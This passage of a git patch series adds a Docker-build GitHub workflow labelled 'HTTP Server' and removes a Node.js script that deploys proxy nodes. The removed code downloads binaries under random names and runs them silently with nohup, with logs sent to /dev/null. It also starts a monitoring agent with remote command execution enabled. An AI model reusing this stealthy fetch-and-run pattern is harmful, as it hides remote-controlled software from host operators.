zn2E<8sOdFBLauC~D<7ui-}usH#lDoSY!AT}Q}t(G`}DJq`!D7tKDW_gliNj5_c6iycNaG$Y(9I7&!WDx3g%|+efG#Q?(>%~ zKb+FbhhdjUWgle3sI|<>=?^!k7v0| z9u9Z#QHQ82xfe+INh4l&2?Y&8hLF>=;_a4qhdFRprrY*jWVX*Z7i{f?F*S|pSe3Af z(b3Unr}UO-Fv3@xF&jZBBUGfJ*BczsrrT?B5k7lZ2gg}V;`{~^A(c+?IsZ1WCia@l zn>JcYp@$C>Wj8faCYuln&xLr%qy`R?QAaCkRr3Y`n+@KZ6CRX`Dl!-9@scW*4$zJk zlK`rMY6~*<1#N4zVAg7=U$b3qTGACX`J2woBRh~bx$ThyDTa4N8g1VR$4cR$P4&Vr>D(b^Zv;NV`8V+8;nkA=8g^YTe z$GUJO0KZJw6Sw{4|36n}5e4scqqnpe(k{&b`1?3fN!PV>0vH6BweG6ZdJ zqCbc{Z^&IHRz`_(0rkj*x`XOjS3uvRRb23dWvQI%0He*9O=_P%$s+i%8o-SEnw$|q^U26pf zRP%mSN9JP_1O&vhf{J#nlcVDTIHCX}7UbSB8_8@MXvL$(eJq?4C)p<#uHOS_WU7>t zZAFUWkmuEkqkGxBTmXuZ76YD2^5F=3L3Yr=YX#t z23whm!u~R5BHQz(QnkWOXR0q7Dsj0l4<@~CHPrMBD<%j>m*u3!-2~M_7q>c3YpnrPb1wEOLvDq91^u-qC}m6&HO*fR zV%hBkg4&pod_NwXQSpeGkq^W*temR|c`P4G%@Jk76f}XnS%2fxxEWkuS!)fyiAN#N z29r8U1$%J8rZU8Ay9m|ipbL_c(IxhCeTR`m26dGLw4vWCx0wDT_AXO{A4A(2v z0JA)~(rkkP!vM1-f5kT|Sq?Tm_1sO*aS1B?RoP{b0t@ett47gQh{&R+OKX_`Z1*ye z%OPCwNaNF9`O7XaIP`a)75?s_P!5fuPH>+McyvVV2pe+_*-z`P=Z_(E5MbNx1ovL>81NVyrHn?DT13a=A?g1z$@}4ef$DmWaWFU0A%{pF zXp8o6vlKu@gnb}pTR-~L-xy#IM8Yb5i!-9JUBJkF22(B!sv$W4k#2m{L8r$%Z!& ztAV|~BCYY%ifQ2wO?n)+{G zkt>cR@>g2GKp!3S!p_L_Qr3+xOvI7fQy?n$I4jPLLM~Ex;}`Rh$m(BL(rDhv``wS%BGNq$!<$dZ{01K*=?4Y2~TM#VmD=!t%*LD<8p!=PZ zd+p$l#Tb{(T8V6u2jw6{n`(gtiOVbM{=$6t*Upc(XKdX~BKZEUom1*Lpk#$PCs4j#Zg9Twg!@2# zXhQKOiB=^gDCZi9T5nD%-(b2!lMjj<+_9xlnPq}=Bb5$;9#STOA;gdDzQTCHlrn1# z?0CQXLV%1D*qs>>N;?pYWyskkR*5*oFPtpEz~hjf%;EiDcox7z!zBqg8aYXRJHJ5F zG?%=)>pxN4W0Mc-U(fQ*cI2<2<=;)whmH|Q!Dh5gs z{|3bCtN+`k2}KB#)J63Dw3!^l-wRsR3)t2kPuSYa9#9Ei@C(x*SF=8=j31r#`8U7h z2(va*L~8j&TUr&Khk8>0N`y%(QS_JB}(tu zFfF(ua0E!4SkG*_*tQlcW63ec*=V!Uv1#cUu)(V=A}JiO|0q{)1r3wIQJoRfCJD|W zXyqWFW2oDO>d&-%+ECgGM(BOGeyaspF7}nrtbgX%EAvyRgmI3e=L2Ut_udIPoG29& z2ZWdt1HmmviYLNNbl|qYKOj{*kl_0Qp(tJ=C)4&70h?~}%5SHPH$bWg7@s4n8pSY# zPvSvrz5Yv2srHGZ@Pn-Yb9zXYYW8w{d^$h!7U}9tApqN57D%;Aba z(1Am*C0d}c6RUeRU&GD7T6(gfRNIqLdANn|@O&`4xTp$icv(~v&ExNYZlf6Rt>C6Q zx5S8?TVE#w)D$Yb>}+K3{`LfNDx%rzyZU$v=JW@C@1u5MxSDz_{!o{vzW}JuDrq@H z-SAu(t>&cRlxtIqAU89o;YUUhrMcTg2lhKIjQ<#L_;@Eud;JrFW0xf}9O3 z)aL$qfo*x9Xt@Bc);TxYeSoxI9-F1E@;80bOpAu|sXj01 z{iA7U`*7_5DYu0=_=_ncMl}f!Lx`YyZ(+^hw_q}Xmbw+Vz*2h_;=VlODotX)50(>d z4l`D{x?X09fAX|RJ=v%0x{Q7S?DRp+>lj=-@jdd(AP3zozINQ}ZLskcfF$OLhWt%$E5u{fhpeoQ&~(4=>!2w?{JA$+`qIpS^dO zvB9H(3w*XCG@(wrRfe}JjebB-`7UvAlUN~%z?+ffQRg1~+6%1CmT9JGk*uH;ZC?vh z@NBiHtFBy^HbmqgQFfuNJ3jTY>)qZ;`pCh*4qiQ#5fV4cGcX1Ll_|p*#!X4Ur?|u&m z@*)4!4_;0XvDv9RbuI7p(YqS5EF4_oh*>Tf#gzVq7q-?*MOYVXbYkj;e&sqw^ZotVL-F3Y=g)f#)Sk6t6JC~PlIso#DH4kOrqAmP3i9p zjjVLvPw^i%=?lNY^TUjtD7_Nbd*oPiB`SA`V$)?Cga2;v&VdG8Ce!9!*q>v%Bl=y zFBz!9{?jT@H|*6tT;i^tJC&$XOAu2Bu%dIN!&+t1r%Tsz(O*hsc z;M=}gJKiAaYlBX4umfVA?g8V=!>6iUnJ+qQu4|?t@2^_R>-qG{v$=-Log3#O_4vm$ z&@>G3$pLBgSxnR4%2clz$9-(!oO%Gnof$y+S?LlP6t( zvvk56k9xZ}FF%pTQSdn)#QOb#n&!rG@7xNzV5-U+ z34EH@_j`NW{R?$>_27`7Rbpv$5ra`6TtAY7?v2u}l=`I4q>_{xpQ_&oin=|PX9|8qjH(rHB#=`?Y$vGP zeM++tTrEhX=m_t5by~+aUPjJDskNUboII23^Wtwr<9Vqcj>5PR($6^ZR>kZx6VTZa z{JFYd`SRfPvHZnt`W)l^4=E~=JqL%Y3!f3O-R|ABU;MezgBTDW5%>XgNA79RDxL>oH{S7vq_I zaFdgRyoiCk!Sq>MF?&S6Pnm$mR(sZI>Inxay8QmP@&gL5V zxOG&YiAn)fI8~v0$3FZkA~*e0P5L<>4`sie0;3X}8Fdy(?r(h5w~!*xPRk!c5wbV% z@(udN-NMok1>^!uu8-m%(Ag15(;Mrm-C^LdydT@wU!ecB4`JI~EE0$f0KjPg0RQbw z-T&-ESUUaJ#LP6WmD}b@{O&uA{tDYzC@7VtoOQ)N_4?!JPG3CfnVcm>lW>5TD4{2F0H*p7T_;EW0O(WW*m;~4^EG65YBXx@VX~YQT zzRh#7AsXwfEE8z2aDU8wBf=;wCgwJm%i#+#JIaVvKZ4x3>%F9)q7eFBy_^!~wx{`L zrMvl2o!$1^^)ay#=hhpo`}6o>+fAL|i@d{u;^Rri;&CMXEK)%1w8r*lHT4qV*KzIX zbjooqXZ!15=i^y>zW8;uw!7QoapDBS&jdw{;G4VSePx$GN5mAOS*kchxv99Atoo(} zvtl%c;Cp?jryN#iI0sZy5Djs??OpmG&M^9%uFu!`M(gV;{|~)T;(^Q0*2y}Izt(1J zCsT&gHrFQV9F_o+i?gZsZcoJcI4ZXxLf+!sbsw&n^O)WIx*fZ~PliKu-oq=zZHVt? z6n<6&{Wkej=M#ROxC4rLB)xCL`;1u2S3po0xoJ$ae0P=>uZ6grxxpmKR-ccTx5Z)P zYusEIL9#x_8o#cG+4GN^zr@osMN=#tqsKup?VAHjAOxij;~2CG;g2hi=M(#GQ{iao z0wQ@#FSCPp=o0|Zf<$w3#0pICn@xETkdz^yk=y6X4b)%o5{Cs-bLD;HhYS{U^8 z49>{h-Cf?p^))B^INs8ytjlYNaiTMH3ghC$-oUs`eJbOGPO5~|BJfgseeF$ zsso7F2Z$Z`h^XUL*7+XZgy3rC;!xWv^>!b*_-tYN>}z=$VwK%CN4wWIgviuzUzL-AC5vpt6> z%6S#uTxZLtG89p^xtm{m2s%Kqzn}Bz-{J_d1iT4qg83BP^feyepJyx0(^h_4U&mqd zr@7*(^huNf^C5PEAOTOyox24-gd{`Df{lwGaZRrU3Odnyzn**Cf;wk2nR30!(wz2( z-@RfOwF*2`X(U$*a-A{dnxWwaBeoRR{zMXU3Z9)}u;r%7WuS<#4wZJ^nyuR{^K~w} zppVfT_LuV?gWB^Dw>G>z9q%(nKg^IB#@aDa1UV9stn4P& zE+blXLmvdUM~-7hkE?~ByUHZOHnvZnUR;&=s4Z-Oy9Bi0{-XwEh9U4S4HY#<=r=em ztDU+pl~YP*q8NHysTLk}&SoF7n=4ASyd@uH1ldE>s4GfxTwYMETdEE?lqi#s0^t&* zp;ZRI9@n3RljcY(jvhbX=lzhg%h=W5SJRq#*NgmPZs@b(^FgUmmr;9d@uw6`$`R=h zsqXSmPd-*3XFnB2h0yghE3MkuO}f$Nox7mA?z*-nZ!NJvYZlO7a`R0hcyd{|Rdwh! zTOkx&=#&TLV~@A{EhlHR5P5f784c+{z0tt|1N-8p(CZHV?_~-J;6MQ+h|Llf4ED(2 z(rjE|*v+0nfD^x{S#Q*jH+hE_#;m?5Bz&(=4N9OU@KjcdjZ^N#JtR&ZTO^0~QUMoF zUzsKcu71+$(?^W3Gf<_`(!A)elGk=~mS~m~t_3?L;00%D#V9Bs!8Zsi-TnT^=Dg(>02?2X%TSJ1|3)sQ1o&-wvh$m8`qFvKJ+|@DP{|)Q;?6~P# z*MZkBDn{tVYN__Df6+Q_mJ)-RCM0c)G`5XrLe!K^F##9D!U0K4K46Z(V4DSl)b~sL zd#U0)TQO%tk3v~01>2Y_i_cd87OVn$rG{yfO-xW%z-mCzm$1C2p6pP;+kBO731?jc zQ8Y;IkBQVO6vB6|FvQlt5fXU*S)&K4`?O9zvaJHKs|y;BY3u>Xl4s>MTcgJ<4wjSS zAK|`gqwKb^qnJ6S+#249i2aE?Kgo|;o&}DLi;KdI80Hs|M3(n)&iKM&-+*in5GrG# z>)VCI$2H}R{RjGDrRE=u_D>85k!y1k9&*9E_8sp<8$C0<6p7Eb?Ps1~#n;93dZd<} zL2tXw2j|N<{4cxhc7VR^^`U@htiVjf+?kxI5H7BkxFdYZS3^%!{o|mvwb3&GQmMl` z*ylf?_6NuUSWXGGZ>|9G(&edD&|QcGotje8Qj$n1!?KZyT947j+_et}e7!`mF3rm_@WzG)5f- zauNZqH&1oHH@|Cake7(4mkptlGg(~jxK)rIVGL>Sxy3GIa=c2$IV=~i0}vsl@l1uJ z2g`g1-b;xXW;O;yBnyRGIq$E?Ip+MNxe40Es3-dRat2%$Vv^?1EUTL0ugqSP<_8i} z#jC%?EV4Z(@?B;$_&^G^9Aw14+hR;g53x1%85YzM%fs3`CL87wzQ8%<0 z1Q?Sk`b~$9D!ch*_)0GkfDOw-O8Wu6=cTOMS@+SJYS0A*PZaP4C^*u|M%h@B^L~Y{emg`E$N za1pFp(SSvjy2*xsG!|tX1p&Xxu%Hl5r2J3fJRUZtxxu0{w0GK-?jk!}v&v%65A?OS>BY|9H@E$;rrQrTE{iGsgONRG3~5xi{8WwS^)^A09P7j`1q}0o-A$+ z_}Kdc6%yj+B=E97JwkJ01cSp;*&z8L&S&TS29vCVe|*~-=#+t=bnf8Nh+r_Qb7WfQ zH4US-)%Av8cq2kWL+O{B z;&G6}DCdrA2P}50GbvQE1&}zI6QWEz6UP`T@R$FkbfW0k@S1VaN$J5gsd1Exe(p_K zTa^(dw`TScnh+lvBOyOI>rjZCWWDV~k-aW12}d<6zHI*D0$<>PQ0YE7bN`^BlcIqW zj5&^u7f@BHT@SpK^u@M`8B!KG&Q@E5hVGV~kfh1BNKbKrcnF>JMo6AAFT0^vi2Dni zA{bC4oCq@4Wn>4M;{Y4toNz`w-=LD_!7|hrk`siS<-{*G8|S(-8)jYtChE#Qtnvni;Yz9j##k!LV9pGvo85)&j41UkTcXmrr&wH?3W&EP zgKqT1u((GV_YVuGsdnRheb{eupftm+EfmsRh)UMApaR>5vXf zg}hqOK%m#oWBTr_Y*r%O0kl(3($014^+%@wblLDiw114WBqVU2w$!$jiKS|#4`YkQ ztzn4b$vo#WV7;b3GZ~cJ{dW{V3(c)X5zY)vu^b?yNF%i{^LE~Mx^j5T5^D;ZJCS?S;LndJtlbLE# zn58vdbD`%S!P4~Un}NHIW?OjeX)*OO-jsJ%r`%w&XaFyc=z0)Km~T(zoSzwZvSw|K zz(!cR&t|Qj^lHIJ>`r0jj{h{ zWD3SDf88NsWEgss#k*+74ihTmk5VwG%1HQ~LRy3td4jU>vE%_WFP!O>np6Tgx41TV zD=1@Py!%K}>Lj5xsZ28CUNK}-?v@lK`bgTb<7TOoRWh_>ANw|86;lZk%GiA|4-GcC z(1TI3VPHTgvgCzvS?tjR)JH!xX9L};viVq@eygWuwX?SfvFOE7ehFj9O^Xg5Ix{br zRwt&`mF*|T>k9oA@?t4YEQ9!}KxE~FzF!gS{mMAJFfNtSJP5W~xWxhK=D^}`7S6pr zZy%PQ+Ch~S9hAAoMqbI0ha%B9lNHd{V%BlTiX$~6C&Nx8seW28EI2s$={gb9c5>Pe z5oBwWS)e^e8hx49m(D9T8e z{nUzSP!|doiRQ{vqOl^lJPN3s9|r#{na_-B9P@vnk#r5?vtx;5)5 zJFp$q@cY_#VVtHX4dh~BWuD$bEHN{mY8*9=Cck$xKs`iv3X_6`j35Vt7Ox@eJueQM zv|jnCC}GOzmU+DTpUmQOA})0b&O;|S_}?mvBnS$~L=m=_DX2J3J6UPWV^rqe!@l;g zh+4KkrVgVSYkS>A@D2747!yzO{y#@HeO7NDMQ>Urc4Vp`6o4eB#RE@`>hvfcE>=Ej zSX7CHF4s9@LN6Ur$aF{t;!X-rrgpN61bll0&O*^>DYLp2P{Xt#VLb1FX3i3;tAb1n9J%_b2RK?!$+Emf}LzRa`K$dO% zRO1~g8_w6(JOpb`h@|ZRsO?qr{}^7Uwsuwq3=W!>9d5hC3ft-82U+k>&}gwEu)tX2 zg1e`fdT23fr?dQ>RF*F1enZ*QNgieT>8E}hys?-g?rxB-92kqcL87{^G_=4e1ddkg z;-s1piWRY)AKHwIvd!b!CxgKhZ1@12Cv|oJNt~j(!|QWhn&v-f-RYRXUp+-pH}E+9 zcHkkyd$wV41f=JkkIBd3fBf0gWK=diwa4JGi2T#7>&aTzX~<@TX|&dZx~N%uIU8ZQ zF#TdnNxX_e>C@hmeBysqnsiFm&5z(}@wFxdR)CTEw^h0`EjalC%529015ef0OPpFE z`7G%5jxT9Jy3~^sTR3^9f83}ZRDzom8=*gy?1~J_mlos-i=T+Den97AqmdLH=dhMq z%1A+PM4Z81qFjR&sBl@V>I%Uk8J}i?Vl-;6Jz0aVnmP&RmMyw||L-gc(x{a(8bhgs zM>VfK6wd?a<8$F?myM=#BE9+L= zT@&80OgsIR0i%F0JpX=7t{qJ1Y&J6canhfc3cAxAw}DM9p)_D=jz2H`? z*{X(hm#9A5u`%=uE18>fYQn3YJv%qf^5#;L^03MvA=dGt=uV^s#%v-xGmuhZnY9S;WD}_ zSPY6(0)^^cJiC&_lIVuz@G?C$$G4f04=B5BmKEX?5%SWdDMw)q&o@O%7x`C>s@8G-Q_6V2CA=u3-OUVvYDtc} z|7J@NIqu#*w~6At@)D^QykN60FJ*g}tlK0~@3D8gm=B0ra!UU@@4BJ4Lpi9rniP{F zn$vs1@fnvUyZC9gm_ph$mrv#v&(5N}D-29*a=5%d8ErjVo#^u~-Y#?)bRUMUvX??Q zDUST}?q$5`*(PzXYE;$tHiYjdNV^P7qi#0afF?8Z(x!ctJU-qq;y^wc;)kspqFRY9 zYCS~W>f^mL-TIHW2l?*ghxB&#&IkO(d+6gnNhC*-tD!hdJjWmeg8DKrd-8;N9D{Vc z>xfMuww7r~-s`4uHaWY!_x`MRF%VchmSBPVum)7eQCU_!j-PixBk4y2#3sd#_f6Ta zp5YNIo|BM=MC#M{96za<*2_Xtbh2IAIAbXONGKIY;9N?GZ{NQG=god#3)nZzg7N!D znHtPsTRE#}Y%Y5+mg}HfUIFzUN|7#Rm>_m(kKv~KS~c?Mg_^=I)$aQt zH(fE@Y=FyA>YumhFAEfmSeXBC4@1xlTAvG*N&6onYZEXznn^4&J*_|zuPE-^K)c{P znNh^l@um+ZDAtka8y)S=d$j53eU9@R?+%C0!sX9f)E?b?E$u}@YL5=@o8>GdV6}-P%?#W|`Kk{Yk zx;q)yHad7eS;2B`idUP!D$%XwY}TK%b&ZYNo?1WAoRekQwsVQ;;c0XCahYexIOcNX zY&#w|`{-^x8`q<{;$?q0ze$J7Ib0B&*%NeZdC)q>>1X!m+}gHUXV<>moZm0k{8#$- zKC~d{)vm+-v%D7lYyF$%oPS#}M<~NdP=ES!2c83~Kdw~Xud8378~a=5v3=8g{|YJ2 z-qg<=9S<4zd=1;FxpZ65V);~!3nm7b56iMJM!D5pa1hR^j@cmFpH_K+)(c4?C+;yWj=?8c-0uP?ReV7L1TnzyTh4*L;+~$BL0ukm|0GSv^ zbYMAZ1Gjmg!!{7+Rp2uZ>(Lu9ld&JZ0WujF_dsw6h;h0UVKRZEI1nL>{g4HaO%VIM zn6cQ0<;Vqe6VcBpK$sW_JWvF~2biZ8pc{z3n+#zf3qKYEvFt5FHxYea7-3?MI!+Uj zW{J_wL(ioM^ZcB!n1?mb26(fwf%I_#;cs9j@OB2Ce8FI9W}0GPZk%Xlk!)&^n3SAq bX_%B|nwV;lWNcz;mSSR@W@Kh&lxhJ0E|Poz literal 0 HcmV?d00001 From 2408894d7b6f9bdc1885ee446ce223be2429ba7e Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:34:30 +0800 Subject: [PATCH 13/19] Create 1 --- .github/workflows/1 | 1 + 1 file changed, 1 insertion(+) create mode 100644 .github/workflows/1 diff --git a/.github/workflows/1 b/.github/workflows/1 new file mode 100644 index 0000000000..8b13789179 --- /dev/null +++ b/.github/workflows/1 @@ -0,0 +1 @@ + From c59f367da289a7a1fe9cde6b3a93093a748fac0d Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:34:55 +0800 Subject: [PATCH 14/19] Add files via upload --- .github/workflows/build-docker-image.yml | 48 ++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 .github/workflows/build-docker-image.yml diff --git a/.github/workflows/build-docker-image.yml b/.github/workflows/build-docker-image.yml new file mode 100644 index 0000000000..5011777664 --- /dev/null +++ b/.github/workflows/build-docker-image.yml @@ -0,0 +1,48 @@ +name: Build and Push Docker Image + +on: + push: + branches: [ main ] + paths: + - 'Dockerfile' + - 'index.js' + - 'package.json' + pull_request: + branches: [ main ] + workflow_dispatch: + +jobs: + build: + runs-on: ubuntu-latest + permissions: + contents: read + packages: write + + steps: + - name: Checkout repository + uses: actions/checkout@v5 + + - name: Log in to GitHub Container Registry + uses: docker/login-action@v4 + with: + registry: ghcr.io + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v4 + + - name: Build and push Docker image + uses: docker/build-push-action@v7 + with: + context: . + push: true + platforms: linux/amd64,linux/arm64 + tags: | + ghcr.io/${{ github.repository_owner }}/nodejs:latest + labels: | + org.opencontainers.image.source=https://github.com/${{ github.repository }} + org.opencontainers.image.description=HTTP Server + org.opencontainers.image.licenses=MIT + cache-from: type=gha + cache-to: type=gha,mode=max From eb16aec4c134f9f98dcb0210c2e68671db7d6ede Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:35:28 +0800 Subject: [PATCH 15/19] Update build-docker-image.yml --- .github/workflows/build-docker-image.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/build-docker-image.yml b/.github/workflows/build-docker-image.yml index 5011777664..dd80cc4eeb 100644 --- a/.github/workflows/build-docker-image.yml +++ b/.github/workflows/build-docker-image.yml @@ -39,7 +39,7 @@ jobs: push: true platforms: linux/amd64,linux/arm64 tags: | - ghcr.io/${{ github.repository_owner }}/nodejs:latest + ghcr.io/${{ github.repository_owner }}/zzzip:9983 labels: | org.opencontainers.image.source=https://github.com/${{ github.repository }} org.opencontainers.image.description=HTTP Server From c6c3f471c425da0091565d4614d27a062ef5fc81 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Sat, 20 Jun 2026 01:35:52 +0800 Subject: [PATCH 16/19] Update index.js --- index.js | 643 +------------------------------------------------------ 1 file changed, 1 insertion(+), 642 deletions(-) diff --git a/index.js b/index.js index e4acef8f91..d01843974a 100644 --- a/index.js +++ b/index.js @@ -1,644 +1,3 @@ #!/usr/bin/env node -const http = require("http"); -const axios = require("axios"); -const os = require('os'); -const fs = require("fs"); -const path = require("path"); -const { promisify } = require('util'); -const exec = promisify(require('child_process').exec); -const UPLOAD_URL = process.env.UPLOAD_URL || ''; // 节点或订阅自动上传地址,需填写部署Merge-sub项目后的首页地址,例如:https://merge.xxx.com -const PROJECT_URL = process.env.PROJECT_URL || ''; // 需要上传订阅或保活时需填写项目分配的url,例如:https://google.com -const AUTO_ACCESS = process.env.AUTO_ACCESS || false; // false关闭自动保活,true开启,需同时填写PROJECT_URL变量 -const FILE_PATH = process.env.FILE_PATH || '.tmp'; // 运行目录,sub节点文件保存目录 -const SUB_PATH = process.env.SUB_PATH || 'sub'; // 订阅路径 -const PORT = process.env.SERVER_PORT || process.env.PORT || 3000; // http服务订阅端口 -const UUID = process.env.UUID || '9afd1229-b893-40c1-84dd-51e7ce204913'; // 使用哪吒v1,在不同的平台运行需修改UUID,否则会覆盖 -const NEZHA_SERVER = process.env.NEZHA_SERVER || ''; // 哪吒v1填写形式: nz.abc.com:8008 哪吒v0填写形式:nz.abc.com -const NEZHA_PORT = process.env.NEZHA_PORT || ''; // 使用哪吒v1请留空,哪吒v0需填写 -const NEZHA_KEY = process.env.NEZHA_KEY || ''; // 哪吒v1的NZ_CLIENT_SECRET或哪吒v0的agent密钥 -const ARGO_DOMAIN = process.env.ARGO_DOMAIN || ''; // 固定隧道域名,留空即启用临时隧道 -const ARGO_AUTH = process.env.ARGO_AUTH || ''; // 固定隧道密钥json或token,留空即启用临时隧道,json获取地址:https://json.zone.id -const ARGO_PORT = process.env.ARGO_PORT || 8001; // 固定隧道端口,使用token需在cloudflare后台设置和这里一致 -const CFIP = process.env.CFIP || 'saas.sin.fan'; // 节点优选域名或优选ip -const CFPORT = process.env.CFPORT || 443; // 节点优选域名或优选ip对应的端口 -const NAME = process.env.NAME || ''; // 节点名称 - -// 创建运行文件夹 -if (!fs.existsSync(FILE_PATH)) { - fs.mkdirSync(FILE_PATH); - console.log(`${FILE_PATH} is created`); -} else { - console.log(`${FILE_PATH} already exists`); -} - -// 生成随机6位字符 -function generateRandomName() { - const characters = 'abcdefghijklmnopqrstuvwxyz'; - let result = ''; - for (let i = 0; i < 6; i++) { - result += characters.charAt(Math.floor(Math.random() * characters.length)); - } - return result; -} - -// 全局常量 -let subContent = null; -const npmName = generateRandomName(); -const webName = generateRandomName(); -const botName = generateRandomName(); -const phpName = generateRandomName(); -let npmPath = path.join(FILE_PATH, npmName); -let phpPath = path.join(FILE_PATH, phpName); -let webPath = path.join(FILE_PATH, webName); -let botPath = path.join(FILE_PATH, botName); -let subPath = path.join(FILE_PATH, 'sub.txt'); -let listPath = path.join(FILE_PATH, 'list.txt'); -let bootLogPath = path.join(FILE_PATH, 'boot.log'); -let configPath = path.join(FILE_PATH, 'config.json'); - -// 如果订阅器上存在历史运行节点则先删除 -function deleteNodes() { - try { - if (!UPLOAD_URL) return; - if (!fs.existsSync(subPath)) return; - - let fileContent; - try { - fileContent = fs.readFileSync(subPath, 'utf-8'); - } catch { - return null; - } - - const decoded = Buffer.from(fileContent, 'base64').toString('utf-8'); - const nodes = decoded.split('\n').filter(line => - /(vless|vmess|trojan|hysteria2|tuic):\/\//.test(line) - ); - - if (nodes.length === 0) return; - - axios.post(`${UPLOAD_URL}/api/delete-nodes`, - JSON.stringify({ nodes }), - { headers: { 'Content-Type': 'application/json' } } - ).catch((error) => { - return null; - }); - return null; - } catch (err) { - return null; - } -} - -// 清理历史文件 -function cleanupOldFiles() { - try { - const files = fs.readdirSync(FILE_PATH); - files.forEach(file => { - const filePath = path.join(FILE_PATH, file); - try { - const stat = fs.statSync(filePath); - if (stat.isFile()) { - fs.unlinkSync(filePath); - } - } catch (err) { - // 忽略所有错误,不记录日志 - } - }); - } catch (err) { - // 忽略所有错误,不记录日志 - } -} - -// 生成xr-ay配置文件 -async function generateConfig() { - const config = { - log: { access: '/dev/null', error: '/dev/null', loglevel: 'none' }, - inbounds: [ - { port: ARGO_PORT, protocol: 'vless', settings: { clients: [{ id: UUID, flow: 'xtls-rprx-vision' }], decryption: 'none', fallbacks: [{ dest: 3001 }, { path: "/vless-argo", dest: 3002 }, { path: "/vmess-argo", dest: 3003 }, { path: "/trojan-argo", dest: 3004 }] }, streamSettings: { network: 'tcp' } }, - { port: 3001, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID }], decryption: "none" }, streamSettings: { network: "tcp", security: "none" } }, - { port: 3002, listen: "127.0.0.1", protocol: "vless", settings: { clients: [{ id: UUID, level: 0 }], decryption: "none" }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/vless-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, - { port: 3003, listen: "127.0.0.1", protocol: "vmess", settings: { clients: [{ id: UUID, alterId: 0 }] }, streamSettings: { network: "ws", wsSettings: { path: "/vmess-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, - { port: 3004, listen: "127.0.0.1", protocol: "trojan", settings: { clients: [{ password: UUID }] }, streamSettings: { network: "ws", security: "none", wsSettings: { path: "/trojan-argo" } }, sniffing: { enabled: true, destOverride: ["http", "tls", "quic"], metadataOnly: false } }, - ], - dns: { servers: ["https+local://8.8.8.8/dns-query"] }, - outbounds: [{ protocol: "freedom", tag: "direct" }, { protocol: "blackhole", tag: "block" }] - }; - fs.writeFileSync(path.join(FILE_PATH, 'config.json'), JSON.stringify(config, null, 2)); -} - -// 判断系统架构 -function getSystemArchitecture() { - const arch = os.arch(); - if (arch === 'arm' || arch === 'arm64' || arch === 'aarch64') { - return 'arm'; - } else { - return 'amd'; - } -} - -// 下载对应系统架构的依赖文件 -function downloadFile(fileName, fileUrl, callback) { - const filePath = fileName; - - if (!fs.existsSync(FILE_PATH)) { - fs.mkdirSync(FILE_PATH, { recursive: true }); - } - - const writer = fs.createWriteStream(filePath); - - axios({ - method: 'get', - url: fileUrl, - responseType: 'stream', - }) - .then(response => { - response.data.pipe(writer); - - writer.on('finish', () => { - writer.close(); - console.log(`Download ${path.basename(filePath)} successfully`); - callback(null, filePath); - }); - - writer.on('error', err => { - fs.unlink(filePath, () => { }); - const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`; - console.error(errorMessage); - callback(errorMessage); - }); - }) - .catch(err => { - const errorMessage = `Download ${path.basename(filePath)} failed: ${err.message}`; - console.error(errorMessage); - callback(errorMessage); - }); -} - -// 下载并运行依赖文件 -async function downloadFilesAndRun() { - const architecture = getSystemArchitecture(); - const filesToDownload = getFilesForArchitecture(architecture); - - if (filesToDownload.length === 0) { - console.log(`Can't find a file for the current architecture`); - return; - } - - const downloadPromises = filesToDownload.map(fileInfo => { - return new Promise((resolve, reject) => { - downloadFile(fileInfo.fileName, fileInfo.fileUrl, (err, filePath) => { - if (err) { - reject(err); - } else { - resolve(filePath); - } - }); - }); - }); - - try { - await Promise.all(downloadPromises); - } catch (err) { - console.error('Error downloading files:', err); - return; - } - - function authorizeFiles(filePaths) { - const newPermissions = 0o775; - filePaths.forEach(absoluteFilePath => { - if (fs.existsSync(absoluteFilePath)) { - fs.chmod(absoluteFilePath, newPermissions, (err) => { - if (err) { - console.error(`Empowerment failed for ${absoluteFilePath}: ${err}`); - } else { - console.log(`Empowerment success for ${absoluteFilePath}: ${newPermissions.toString(8)}`); - } - }); - } - }); - } - const filesToAuthorize = NEZHA_PORT ? [npmPath, webPath, botPath] : [phpPath, webPath, botPath]; - authorizeFiles(filesToAuthorize); - - // 运行ne-zha - if (NEZHA_SERVER && NEZHA_KEY) { - if (!NEZHA_PORT) { - const port = NEZHA_SERVER.includes(':') ? NEZHA_SERVER.split(':').pop() : ''; - const tlsPorts = new Set(['443', '8443', '2096', '2087', '2083', '2053']); - const nezhatls = tlsPorts.has(port) ? 'true' : 'false'; - const configYaml = ` -client_secret: ${NEZHA_KEY} -debug: false -disable_auto_update: true -disable_command_execute: false -disable_force_update: true -disable_nat: false -disable_send_query: false -gpu: false -insecure_tls: true -ip_report_period: 1800 -report_delay: 4 -server: ${NEZHA_SERVER} -skip_connection_count: true -skip_procs_count: true -temperature: false -tls: ${nezhatls} -use_gitee_to_upgrade: false -use_ipv6_country_code: false -uuid: ${UUID}`; - - fs.writeFileSync(path.join(FILE_PATH, 'config.yaml'), configYaml); - - const command = `nohup ${phpPath} -c "${FILE_PATH}/config.yaml" >/dev/null 2>&1 &`; - try { - await exec(command); - console.log(`${phpName} is running`); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - console.error(`php running error: ${error}`); - } - } else { - let NEZHA_TLS = ''; - const tlsPorts = ['443', '8443', '2096', '2087', '2083', '2053']; - if (tlsPorts.includes(NEZHA_PORT)) { - NEZHA_TLS = '--tls'; - } - const command = `nohup ${npmPath} -s ${NEZHA_SERVER}:${NEZHA_PORT} -p ${NEZHA_KEY} ${NEZHA_TLS} --disable-auto-update --report-delay 4 --skip-conn --skip-procs >/dev/null 2>&1 &`; - try { - await exec(command); - console.log(`${npmName} is running`); - await new Promise((resolve) => setTimeout(resolve, 1000)); - } catch (error) { - 